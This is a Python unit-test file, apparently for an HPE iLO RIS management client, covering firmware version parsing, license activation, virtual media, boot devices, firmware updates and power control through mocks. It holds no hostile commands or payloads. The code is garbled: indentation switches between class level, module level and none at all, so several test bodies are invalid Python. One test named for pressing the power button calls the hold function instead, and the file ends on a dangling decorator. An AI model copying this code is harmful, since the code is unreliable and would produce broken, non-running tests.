    self.assertEqual(
        "2.04", self.client.get_ilo_firmware_version_as_major_minor())
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_get_ilo_firmware_version_as_major_minor_suggested_min(
        self, get_ilo_details_mock):
    """Firmware equal to the suggested minimum is reported as '2.30'."""
    details = json.loads(ris_outputs.GET_MANAGER_DETAILS_EQ_SUGGESTED)
    get_ilo_details_mock.return_value = (details, '/rest/v1/Managers/1')

    self.assertEqual(
        "2.30", self.client.get_ilo_firmware_version_as_major_minor())
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_get_ilo_firmware_version_as_major_minor_gt_suggested_min(
        self, get_ilo_details_mock):
    """Firmware above the suggested minimum is reported as '2.54'."""
    details = json.loads(ris_outputs.GET_MANAGER_DETAILS_GT_SUGGESTED)
    get_ilo_details_mock.return_value = (details, '/rest/v1/Managers/1')

    self.assertEqual(
        "2.54", self.client.get_ilo_firmware_version_as_major_minor())
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_get_ilo_firmware_version_as_major_minor_no_firmware(
        self, get_ilo_details_mock):
    """Missing firmware information yields None rather than an error."""
    details = json.loads(ris_outputs.GET_MANAGER_DETAILS_NO_FIRMWARE)
    get_ilo_details_mock.return_value = (details, '/rest/v1/Managers/1')

    self.assertIsNone(
        self.client.get_ilo_firmware_version_as_major_minor())
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test__get_ilo_firmware_version(self, get_ilo_details_mock):
    """_get_ilo_firmware_version returns a one-entry capability dict."""
    details = json.loads(ris_outputs.GET_MANAGER_DETAILS)
    get_ilo_details_mock.return_value = (details, '/rest/v1/Managers/1')

    ilo_firm = self.client._get_ilo_firmware_version()

    self.assertIn('ilo_firmware_version', ilo_firm)
    self.assertEqual({'ilo_firmware_version': 'iLO 4 v2.20'}, ilo_firm)
@mock.patch.object(ris.RISOperations, '_rest_post')
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_activate_license(self, get_ilo_details_mock, post_mock):
    """activate_license POSTs the key to the manager's LicenseService."""
    ilo_details = json.loads(ris_outputs.GET_MANAGER_DETAILS)
    uri = '/rest/v1/Managers/1'
    license_uri = "/rest/v1/Managers/1/LicenseService"
    get_ilo_details_mock.return_value = (ilo_details, uri)
    post_mock.return_value = (200, ris_outputs.GET_HEADERS,
                              ris_outputs.REST_POST_RESPONSE)
    self.client.activate_license('testkey')
    get_ilo_details_mock.assert_called_once_with()
    post_mock.assert_called_once_with(license_uri, None,
                                      {'LicenseKey': 'testkey'})
@mock.patch.object(ris.RISOperations, '_rest_post')
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_activate_license_IloError(self, get_ilo_details_mock, post_mock):
    """A 500 from the LicenseService POST surfaces as IloError."""
    ilo_details = json.loads(ris_outputs.GET_MANAGER_DETAILS)
    uri = '/rest/v1/Managers/1'
    license_uri = "/rest/v1/Managers/1/LicenseService"
    get_ilo_details_mock.return_value = (ilo_details, uri)
    post_mock.return_value = (500, ris_outputs.GET_HEADERS,
                              ris_outputs.REST_FAILURE_OUTPUT)
    self.assertRaises(exception.IloError, self.client.activate_license,
                      'testkey')
    get_ilo_details_mock.assert_called_once_with()
    post_mock.assert_called_once_with(license_uri, None,
                                      {'LicenseKey': 'testkey'})
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_activate_license_IloCommandNotSupported(self,
                                                 get_ilo_details_mock):
    """Without a LicenseService link the operation is unsupported."""
    ilo_details = json.loads(ris_outputs.GET_MANAGER_DETAILS)
    # Strip the LicenseService link so the client cannot find it.
    del ilo_details['Oem']['Hp']['links']['LicenseService']
    uri = '/rest/v1/Managers/1'
    get_ilo_details_mock.return_value = (ilo_details, uri)
    self.assertRaises(exception.IloCommandNotSupportedError,
                      self.client.activate_license, 'testkey')
    get_ilo_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_get_vm_status_floppy_empty(self, get_vm_device_status_mock):
    """get_vm_status maps an empty FLOPPY device response to the
    expected RIBCL-style status dict.
    """
    floppy_resp = json.loads(ris_outputs.RESP_VM_STATUS_FLOPPY_EMPTY)
    device_uri = floppy_resp["links"]["self"]["href"]
    get_vm_device_status_mock.return_value = (floppy_resp, device_uri)
    exp_result = json.loads(ris_outputs.GET_VM_STATUS_FLOPPY_EMPTY)
    result = self.client.get_vm_status('FLOPPY')
    self.assertEqual(result, exp_result)
    get_vm_device_status_mock.assert_called_once_with('FLOPPY')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_get_vm_status_floppy_inserted(self, get_vm_device_status_mock):
    """get_vm_status maps a FLOPPY response with media inserted to the
    expected status dict.
    """
    floppy_resp = json.loads(ris_outputs.RESP_VM_STATUS_FLOPPY_INSERTED)
    device_uri = floppy_resp["links"]["self"]["href"]
    get_vm_device_status_mock.return_value = (floppy_resp, device_uri)
    exp_result = json.loads(ris_outputs.GET_VM_STATUS_FLOPPY_INSERTED)
    result = self.client.get_vm_status('FLOPPY')
    self.assertEqual(result, exp_result)
    get_vm_device_status_mock.assert_called_once_with('FLOPPY')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_get_vm_status_cdrom_empty(self, get_vm_device_status_mock):
    """get_vm_status maps an empty CDROM device response to the
    expected status dict.
    """
    cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_EMPTY)
    device_uri = cdrom_resp["links"]["self"]["href"]
    get_vm_device_status_mock.return_value = (cdrom_resp, device_uri)
    exp_result = json.loads(ris_outputs.GET_VM_STATUS_CDROM_EMPTY)
    result = self.client.get_vm_status('CDROM')
    self.assertEqual(result, exp_result)
    get_vm_device_status_mock.assert_called_once_with('CDROM')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_get_vm_status_cdrom_inserted(self, get_vm_device_status_mock):
    """get_vm_status maps a CDROM response with media inserted to the
    expected status dict.
    """
    cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_INSERTED)
    device_uri = cdrom_resp["links"]["self"]["href"]
    get_vm_device_status_mock.return_value = (cdrom_resp, device_uri)
    exp_result = json.loads(ris_outputs.GET_VM_STATUS_CDROM_INSERTED)
    result = self.client.get_vm_status('CDROM')
    self.assertEqual(result, exp_result)
    get_vm_device_status_mock.assert_called_once_with('CDROM')
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test_set_vm_status_cdrom_connect(self, patch_mock):
    """The 'CONNECT' boot option issues no PATCH at all."""
    self.client.set_vm_status('CDROM', boot_option='CONNECT')

    self.assertFalse(patch_mock.called)
def test_set_vm_status_cdrom_invalid_arg(self):
    """An unrecognized boot_option raises IloInvalidInputError."""
    self.assertRaises(exception.IloInvalidInputError,
                      self.client.set_vm_status,
                      device='CDROM', boot_option='FOO')
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_set_vm_status_cdrom(self, get_vm_device_mock, patch_mock):
    """set_vm_status with BOOT_ONCE PATCHes the virtual-media resource
    with the expected payload.
    """
    vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
    cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_INSERTED)
    device_uri = cdrom_resp["links"]["self"]["href"]
    get_vm_device_mock.return_value = (cdrom_resp, device_uri)
    vm_patch = json.loads(ris_outputs.PATCH_VM_CDROM)
    patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
                               ris_outputs.REST_POST_RESPONSE)
    self.client.set_vm_status(device='CDROM', boot_option='BOOT_ONCE')
    get_vm_device_mock.assert_called_once_with('CDROM')
    patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_set_vm_status_cdrom_fail(self, get_vm_device_mock, patch_mock):
    """A non-2xx PATCH status makes set_vm_status raise IloError."""
    vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
    cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_INSERTED)
    device_uri = cdrom_resp["links"]["self"]["href"]
    get_vm_device_mock.return_value = (cdrom_resp, device_uri)
    vm_patch = json.loads(ris_outputs.PATCH_VM_CDROM)
    patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
                               ris_outputs.REST_FAILURE_OUTPUT)
    self.assertRaises(exception.IloError,
                      self.client.set_vm_status,
                      device='CDROM', boot_option='BOOT_ONCE')
    get_vm_device_mock.assert_called_once_with('CDROM')
    patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_insert_virtual_media(self, get_vm_device_mock, patch_mock):
    """insert_virtual_media PATCHes the image URL onto an empty device."""
    vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
    cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_EMPTY)
    device_uri = cdrom_resp["links"]["self"]["href"]
    get_vm_device_mock.return_value = (cdrom_resp, device_uri)
    vm_patch = {'Image': 'http://1.1.1.1/cdrom.iso'}
    patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
                               ris_outputs.REST_POST_RESPONSE)
    self.client.insert_virtual_media('http://1.1.1.1/cdrom.iso',
                                     device='CDROM')
    get_vm_device_mock.assert_called_once_with('CDROM')
    patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, 'eject_virtual_media')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_insert_virtual_media_media_attached(self,
                                             get_vm_device_mock,
                                             eject_virtual_media_mock,
                                             patch_mock):
    """If media is already inserted, insert_virtual_media ejects it
    first and then PATCHes the new image URL.
    """
    vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
    cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_INSERTED)
    device_uri = cdrom_resp["links"]["self"]["href"]
    get_vm_device_mock.return_value = (cdrom_resp, device_uri)
    vm_patch = {'Image': 'http://1.1.1.1/cdrom.iso'}
    patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
                               ris_outputs.REST_POST_RESPONSE)
    self.client.insert_virtual_media('http://1.1.1.1/cdrom.iso',
                                     device='CDROM')
    get_vm_device_mock.assert_called_once_with('CDROM')
    eject_virtual_media_mock.assert_called_once_with('CDROM')
    patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_insert_virtual_media_fail(self, get_vm_device_mock, patch_mock):
    """A non-2xx PATCH status makes insert_virtual_media raise IloError."""
    vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
    cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_EMPTY)
    device_uri = cdrom_resp["links"]["self"]["href"]
    get_vm_device_mock.return_value = (cdrom_resp, device_uri)
    vm_patch = {'Image': 'http://1.1.1.1/cdrom.iso'}
    patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
                               ris_outputs.REST_FAILURE_OUTPUT)
    self.assertRaises(exception.IloError,
                      self.client.insert_virtual_media,
                      'http://1.1.1.1/cdrom.iso', device='CDROM')
    get_vm_device_mock.assert_called_once_with('CDROM')
    patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_eject_virtual_media(self, get_vm_device_mock, patch_mock):
    """eject_virtual_media PATCHes {'Image': None} when media is in."""
    vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
    cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_INSERTED)
    device_uri = cdrom_resp["links"]["self"]["href"]
    get_vm_device_mock.return_value = (cdrom_resp, device_uri)
    vm_patch = {'Image': None}
    patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
                               ris_outputs.REST_POST_RESPONSE)
    self.client.eject_virtual_media(device='CDROM')
    get_vm_device_mock.assert_called_once_with('CDROM')
    patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_eject_virtual_media_cdrom_empty(
        self, get_vm_device_mock, patch_mock):
    """Ejecting an already-empty CDROM skips the PATCH entirely."""
    cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_EMPTY)
    get_vm_device_mock.return_value = (
        cdrom_resp, cdrom_resp["links"]["self"]["href"])

    self.client.eject_virtual_media(device='CDROM')

    get_vm_device_mock.assert_called_once_with('CDROM')
    self.assertFalse(patch_mock.called)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_vm_device_status')
def test_eject_virtual_media_fail(self, get_vm_device_mock, patch_mock):
    """A non-2xx PATCH status makes eject_virtual_media raise IloError."""
    vm_uri = '/rest/v1/Managers/1/VirtualMedia/2'
    cdrom_resp = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_INSERTED)
    device_uri = cdrom_resp["links"]["self"]["href"]
    get_vm_device_mock.return_value = (cdrom_resp, device_uri)
    vm_patch = {'Image': None}
    patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
                               ris_outputs.REST_FAILURE_OUTPUT)
    self.assertRaises(exception.IloError,
                      self.client.eject_virtual_media, device='CDROM')
    get_vm_device_mock.assert_called_once_with('CDROM')
    patch_mock.assert_called_once_with(vm_uri, None, vm_patch)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_one_time_boot_not_set(self, get_host_details_mock):
    """With no one-time boot override the result is 'Normal'."""
    get_host_details_mock.return_value = json.loads(
        ris_outputs.RESPONSE_BODY_FOR_REST_OP)

    self.assertEqual('Normal', self.client.get_one_time_boot())
    get_host_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_one_time_boot_cdrom(self, get_host_details_mock):
    """A CDROM one-time boot override is reported as 'CDROM'."""
    get_host_details_mock.return_value = json.loads(
        ris_outputs.RESP_BODY_FOR_SYSTEM_WITH_CDROM)

    self.assertEqual('CDROM', self.client.get_one_time_boot())
    get_host_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_one_time_boot_UefiShell(self, get_host_details_mock):
    """A UEFI shell one-time boot override is reported as 'UefiShell'."""
    get_host_details_mock.return_value = json.loads(
        ris_outputs.RESP_BODY_WITH_UEFI_SHELL)

    self.assertEqual('UefiShell', self.client.get_one_time_boot())
    get_host_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_one_time_boot_exc(self, get_host_details_mock):
    """Host details lacking boot data make get_one_time_boot raise."""
    get_host_details_mock.return_value = json.loads(
        ris_outputs.RESP_BODY_FOR_SYSTEM_WITHOUT_BOOT)

    self.assertRaises(exception.IloError, self.client.get_one_time_boot)
    get_host_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_update_persistent_boot')
def test_set_one_time_boot_cdrom(self, update_persistent_boot_mock):
    """One-time boot delegates with persistent=False."""
    self.client.set_one_time_boot('cdrom')

    update_persistent_boot_mock.assert_called_once_with(['cdrom'],
                                                        persistent=False)
@mock.patch.object(ris.RISOperations, '_update_persistent_boot')
def test_set_one_time_boot_iscsi(self, update_persistent_boot_mock):
    """One-time ISCSI boot also delegates with persistent=False."""
    self.client.set_one_time_boot('ISCSI')

    update_persistent_boot_mock.assert_called_once_with(['ISCSI'],
                                                        persistent=False)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_persistent_boot_device_cdrom(self, get_host_details_mock):
    """A CDROM continuous boot override is reported as 'CDROM'."""
    system_data = json.loads(ris_outputs.SYSTEM_WITH_CDROM_CONT)
    get_host_details_mock.return_value = system_data
    ret = self.client.get_persistent_boot_device()
    get_host_details_mock.assert_called_once_with()
    self.assertEqual(ret, 'CDROM')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_persistent_boot_device_UefiShell(self, get_host_details_mock):
    """A UEFI-shell continuous boot override is reported as 'UefiShell'."""
    system_data = json.loads(ris_outputs.SYSTEM_WITH_UEFISHELL_CONT)
    get_host_details_mock.return_value = system_data
    ret = self.client.get_persistent_boot_device()
    get_host_details_mock.assert_called_once_with()
    self.assertEqual(ret, 'UefiShell')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_persistent_boot_device_exc(self, get_host_details_mock):
    """Host details lacking boot data make the call raise IloError."""
    system_data = json.loads(ris_outputs.RESP_BODY_FOR_SYSTEM_WITHOUT_BOOT)
    get_host_details_mock.return_value = system_data
    self.assertRaises(exception.IloError,
                      self.client.get_persistent_boot_device)
    get_host_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_persistent_boot_device_bios(self, get_host_details_mock,
                                         _uefi_boot_mode_mock):
    """In legacy BIOS mode no persistent boot device is resolved (None)."""
    system_data = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
    get_host_details_mock.return_value = system_data
    _uefi_boot_mode_mock.return_value = False
    ret = self.client.get_persistent_boot_device()
    get_host_details_mock.assert_called_once_with()
    self.assertIsNone(ret)
@mock.patch.object(ris.RISOperations, '_get_persistent_boot_devices')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def _test_get_persistent_boot_device_uefi(self, get_host_details_mock,
                                          _uefi_boot_mode_mock,
                                          boot_devices_mock,
                                          boot_devices,
                                          boot_sources,
                                          exp_ret_value=None):
    """Shared driver for the UEFI persistent-boot-device tests.

    Patches the host-details / boot-mode / boot-devices lookups,
    feeds in the caller-supplied boot order + sources, and asserts
    get_persistent_boot_device() returns *exp_ret_value*.
    Note: keyword args after the injected mocks are supplied by the
    individual test_* wrappers below, not by the mock decorators.
    """
    system_data = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
    get_host_details_mock.return_value = system_data
    _uefi_boot_mode_mock.return_value = True
    boot_devices_mock.return_value = boot_sources, boot_devices
    ret = self.client.get_persistent_boot_device()
    get_host_details_mock.assert_called_once_with()
    _uefi_boot_mode_mock.assert_called_once_with()
    boot_devices_mock.assert_called_once_with()
    self.assertEqual(ret, exp_ret_value)
def test_get_persistent_boot_device_uefi_pxe(self):
    """A PXE UEFI boot order maps to 'NETWORK'."""
    self._test_get_persistent_boot_device_uefi(
        boot_devices=ris_outputs.UEFI_BOOT_DEVICE_ORDER_PXE,
        boot_sources=json.loads(ris_outputs.UEFI_BootSources),
        exp_ret_value='NETWORK')
def test_get_persistent_boot_device_uefi_cd(self):
    """A CD UEFI boot order maps to 'CDROM'.

    Fix: dropped two stale @mock.patch.object decorators whose
    injected mocks were never used -- all patching is done inside the
    shared _test_get_persistent_boot_device_uefi helper, exactly as in
    the sibling pxe/hdd/none variants.
    """
    boot_devs = ris_outputs.UEFI_BOOT_DEVICE_ORDER_CD
    boot_srcs = json.loads(ris_outputs.UEFI_BootSources)
    self._test_get_persistent_boot_device_uefi(boot_devices=boot_devs,
                                               boot_sources=boot_srcs,
                                               exp_ret_value='CDROM')
def test_get_persistent_boot_device_uefi_hdd(self):
    """An HDD UEFI boot order maps to 'HDD'."""
    self._test_get_persistent_boot_device_uefi(
        boot_devices=ris_outputs.UEFI_BOOT_DEVICE_ORDER_HDD,
        boot_sources=json.loads(ris_outputs.UEFI_BootSources),
        exp_ret_value='HDD')
def test_get_persistent_boot_device_uefi_none(self):
    """An unrecognized UEFI boot order yields None."""
    self._test_get_persistent_boot_device_uefi(
        boot_devices=ris_outputs.UEFI_BOOT_DEVICE_ORDER_ERR,
        boot_sources=json.loads(ris_outputs.UEFI_BootSources),
        exp_ret_value=None)
@mock.patch.object(ris.RISOperations, '_get_persistent_boot_devices')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_persistent_boot_device_uefi_exp(self, get_host_details_mock,
                                             _uefi_boot_mode_mock,
                                             boot_devices_mock):
    """Malformed UEFI boot sources make the call raise IloError."""
    system_data = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
    get_host_details_mock.return_value = system_data
    _uefi_boot_mode_mock.return_value = True
    devices = ris_outputs.UEFI_BOOT_DEVICE_ORDER_HDD
    sources = json.loads(ris_outputs.UEFI_BOOT_SOURCES_ERR)
    boot_devices_mock.return_value = sources, devices
    self.assertRaises(exception.IloError,
                      self.client.get_persistent_boot_device)
    get_host_details_mock.assert_called_once_with()
    _uefi_boot_mode_mock.assert_called_once_with()
    boot_devices_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_update_persistent_boot')
def test_update_persistent_boot_cdrom(self, update_persistent_boot_mock):
    """Persistent boot update delegates with persistent=True."""
    self.client.update_persistent_boot(['cdrom'])

    update_persistent_boot_mock.assert_called_once_with(['cdrom'],
                                                        persistent=True)
@mock.patch.object(ris.RISOperations, '_update_persistent_boot')
def test_update_persistent_boot_iscsi(self, update_persistent_boot_mock):
    """Persistent ISCSI boot update delegates with persistent=True."""
    self.client.update_persistent_boot(['ISCSI'])

    update_persistent_boot_mock.assert_called_once_with(['ISCSI'],
                                                        persistent=True)
@mock.patch.object(ris.RISOperations, '_update_persistent_boot')
def test_update_persistent_boot_exc(self, update_persistent_boot_mock):
self.assertRaises(exception.IloError,
self.client.update_persistent_boot, ['fake'])
self.assertFalse(update_persistent_boot_mock.called)
def test_update_firmware_throws_error_for_invalid_component(self):
# | WHEN | & | THEN |
self.assertRaises(exception.InvalidInputError,
self.client.update_firmware,
'fw_file_url',
'invalid_component')
    @mock.patch.object(ris.RISOperations,
                       '_get_firmware_update_service_resource',
                       autospec=True)
    @mock.patch.object(ris.RISOperations, '_rest_post', autospec=True)
    @mock.patch.object(ris.common, 'wait_for_ris_firmware_update_to_complete',
                       autospec=True)
    @mock.patch.object(ris.RISOperations, 'get_firmware_update_progress',
                       autospec=True)
    def test_update_firmware(
            self, get_firmware_update_progress_mock,
            wait_for_ris_firmware_update_to_complete_mock, _rest_post_mock,
            _get_firmware_update_service_resource_mock):
        """Happy path: POST InstallFromURI, wait, then read COMPLETED state."""
        # | GIVEN |
        _rest_post_mock.return_value = 200, 'some-headers', 'response'
        get_firmware_update_progress_mock.return_value = 'COMPLETED', 100
        # | WHEN |
        self.client.update_firmware('fw_file_url', 'ilo')
        # | THEN |
        _get_firmware_update_service_resource_mock.assert_called_once_with(
            self.client)
        _rest_post_mock.assert_called_once_with(
            self.client, mock.ANY, None, {'Action': 'InstallFromURI',
                                          'FirmwareURI': 'fw_file_url',
                                          })
        wait_for_ris_firmware_update_to_complete_mock.assert_called_once_with(
            self.client)
        get_firmware_update_progress_mock.assert_called_once_with(
            self.client)
@mock.patch.object(
ris.RISOperations, '_get_firmware_update_service_resource',
autospec=True)
@mock.patch.object(ris.RISOperations, '_rest_post', autospec=True)
def test_update_firmware_throws_if_post_operation_fails(
self, _rest_post_mock, _get_firmware_update_service_resource_mock):
# | GIVEN |
_rest_post_mock.return_value = 500, 'some-headers', 'response'
# | WHEN | & | THEN |
self.assertRaises(exception.IloError,
self.client.update_firmware,
'fw_file_url',
'cpld')
    @mock.patch.object(ris.RISOperations,
                       '_get_firmware_update_service_resource',
                       autospec=True)
    @mock.patch.object(ris.RISOperations, '_rest_post', autospec=True)
    @mock.patch.object(ris.common, 'wait_for_ris_firmware_update_to_complete',
                       autospec=True)
    @mock.patch.object(ris.RISOperations, 'get_firmware_update_progress',
                       autospec=True)
    def test_update_firmware_throws_if_error_occurs_in_update(
            self, get_firmware_update_progress_mock,
            wait_for_ris_firmware_update_to_complete_mock, _rest_post_mock,
            _get_firmware_update_service_resource_mock):
        """An ERROR progress state after the POST surfaces as IloError."""
        # | GIVEN |
        _rest_post_mock.return_value = 200, 'some-headers', 'response'
        get_firmware_update_progress_mock.return_value = 'ERROR', 0
        # | WHEN | & | THEN |
        self.assertRaises(exception.IloError,
                          self.client.update_firmware,
                          'fw_file_url',
                          'ilo')
@mock.patch.object(ris.RISOperations,
'_get_firmware_update_service_resource',
autospec=True)
@mock.patch.object(ris.RISOperations, '_rest_get', autospec=True)
def test_get_firmware_update_progress(
self, _rest_get_mock,
_get_firmware_update_service_resource_mock):
# | GIVEN |
_rest_get_mock.return_value = (200, 'some-headers',
{'State': 'COMPLETED',
'ProgressPercent': 100})
# | WHEN |
state, percent = self.client.get_firmware_update_progress()
# | THEN |
_get_firmware_update_service_resource_mock.assert_called_once_with(
self.client)
_rest_get_mock.assert_called_once_with(self.client, mock.ANY)
self.assertTupleEqual((state, percent), ('COMPLETED', 100))
@mock.patch.object(ris.RISOperations,
'_get_firmware_update_service_resource',
autospec=True)
@mock.patch.object(ris.RISOperations, '_rest_get', autospec=True)
def test_get_firmware_update_progress_throws_if_get_operation_fails(
self, _rest_get_mock, _get_firmware_update_service_resource_mock):
# | GIVEN |
_rest_get_mock.return_value = 500, 'some-headers', 'response'
# | WHEN | & | THEN |
self.assertRaises(exception.IloError,
self.client.get_firmware_update_progress)
    @mock.patch.object(ris.RISOperations, 'get_host_power_status')
    def test_set_host_power_no_change(self, host_power_status_mock):
        """No power operation is attempted when already in the target state."""
        host_power_status_mock.return_value = 'ON'
        self.client.set_host_power('on')
        self.assertTrue(host_power_status_mock.called)
    @mock.patch.object(ris.RISOperations, 'get_host_power_status')
    def test_set_host_power_exc(self, host_power_status_mock):
        """An unrecognized power target raises IloInvalidInputError."""
        self.assertRaises(exception.IloInvalidInputError,
                          self.client.set_host_power, 'invalid')
    @mock.patch.object(ris.RISOperations, '_perform_power_op')
    @mock.patch.object(ris.RISOperations, 'get_host_power_status')
    @mock.patch.object(ris.RISOperations, 'get_product_name')
    @mock.patch.object(ris.RISOperations, '_retry_until_powered_on')
    def test_set_host_power_off_for_blade_servers(self, retry_mock,
                                                  product_mock,
                                                  host_power_status_mock,
                                                  perform_power_op_mock):
        """Powering off a blade (BL) server issues ForceOff with no retry."""
        host_power_status_mock.return_value = 'ON'
        product_mock.return_value = 'ProLiant BL460'
        self.client.set_host_power('off')
        host_power_status_mock.assert_called_once_with()
        perform_power_op_mock.assert_called_once_with('ForceOff')
        self.assertFalse(retry_mock.called)
    @mock.patch.object(ris.RISOperations, '_perform_power_op')
    @mock.patch.object(ris.RISOperations, 'get_host_power_status')
    @mock.patch.object(ris.RISOperations, 'get_product_name')
    @mock.patch.object(ris.RISOperations, '_retry_until_powered_on')
    def test_set_host_power_on_for_blade_servers(self, retry_mock,
                                                 product_mock,
                                                 host_power_status_mock,
                                                 perform_power_op_mock):
        """Powering on a blade (BL) server goes via the retry helper."""
        host_power_status_mock.return_value = 'OFF'
        product_mock.return_value = 'ProLiant BL460'
        self.client.set_host_power('On')
        host_power_status_mock.assert_called_once_with()
        self.assertTrue(product_mock.called)
        self.assertFalse(perform_power_op_mock.called)
        self.assertTrue(retry_mock.called)
@mock.patch.object(ris.RISOperations, '_perform_power_op')
@mock.patch.object(ris.RISOperations, 'get_host_power_status')
@mock.patch.object(ris.RISOperations, '_retry_until_powered_on')
def test_set_host_power_off_for_non_blade_servers(
self, retry_mock, host_power_status_mock, perform_power_op_mock):
host_power_status_mock.return_value = 'ON'
self.client.set_host_power('off')
host_power_status_mock.assert_called_once_with()
perform_power_op_mock.assert_called_once_with('ForceOff')
self.assertFalse(retry_mock.called)
    @mock.patch.object(ris.RISOperations, '_perform_power_op')
    @mock.patch.object(ris.RISOperations, 'get_host_power_status')
    @mock.patch.object(ris.RISOperations, 'get_product_name')
    @mock.patch.object(ris.RISOperations, '_retry_until_powered_on')
    def test_set_host_power_on_for_non_blade_servers(
            self, retry_mock, product_mock, host_power_status_mock,
            perform_power_op_mock):
        """Powering on a non-blade (DL) server uses a direct power op."""
        host_power_status_mock.return_value = 'OFF'
        product_mock.return_value = 'ProLiant DL380'
        self.client.set_host_power('On')
        host_power_status_mock.assert_called_once_with()
        self.assertTrue(product_mock.called)
        self.assertTrue(perform_power_op_mock.called)
        self.assertFalse(retry_mock.called)
@mock.patch.object(ris.RISOperations, '_perform_power_op')
@mock.patch.object(ris.RISOperations, 'get_host_power_status')
def test_retry_until_powered_on_3times(self, host_power_status_mock,
perform_power_mock):
host_power_status_mock.side_effect = ['OFF', 'OFF', 'ON']
self.client._retry_until_powered_on('ON')
self.assertEqual(3, host_power_status_mock.call_count)
    @mock.patch.object(ris.RISOperations, '_perform_power_op')
    @mock.patch.object(ris.RISOperations, 'get_host_power_status')
    def test_retry_until_powered_on(self, host_power_status_mock,
                                    perform_power_mock):
        """Polling stops after one check when the host is already ON."""
        host_power_status_mock.return_value = 'ON'
        self.client._retry_until_powered_on('ON')
        self.assertEqual(1, host_power_status_mock.call_count)
    @mock.patch.object(ris.RISOperations, '_perform_power_op')
    def test_reset_server(self, mock_perform_power):
        """reset_server triggers a ForceRestart power operation."""
        self.client.reset_server()
        mock_perform_power.assert_called_once_with("ForceRestart")
    @mock.patch.object(ris.RISOperations, '_press_pwr_btn')
    def test_hold_pwr_btn(self, press_pwr_btn_mock):
        """hold_pwr_btn presses and holds the virtual power button."""
        self.client.hold_pwr_btn()
        press_pwr_btn_mock.assert_called_once_with(pushType="PressAndHold")
@mock.patch.object(ris.RISOperations, '_press_pwr_btn')
def test_press_pwr_btn(self, press_pwr_btn_mock):
self.client.hold_pwr_btn()
press_pwr_btn_mock.assert_called_once_with(pushType="PressAndHold")
@mock.patch.object(ris.RISOperations, '_perform_power_op')
